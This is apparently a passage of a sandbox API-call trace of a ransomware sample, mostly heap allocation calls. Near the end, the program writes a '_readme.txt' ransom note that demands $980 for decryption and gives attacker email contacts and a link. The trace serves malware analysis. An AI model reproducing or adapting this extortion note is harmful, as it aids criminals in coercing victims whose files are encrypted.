[0179.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.599] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0179.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.599] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.599] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.599] PathFindFileNameW (pszPath="") returned="" [0179.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0179.599] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.600] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0179.600] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0179.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.600] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.600] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0179.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.600] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0179.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.601] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.601] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.601] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.603] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*" (normalized: "c:\\boot\\tr-tr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 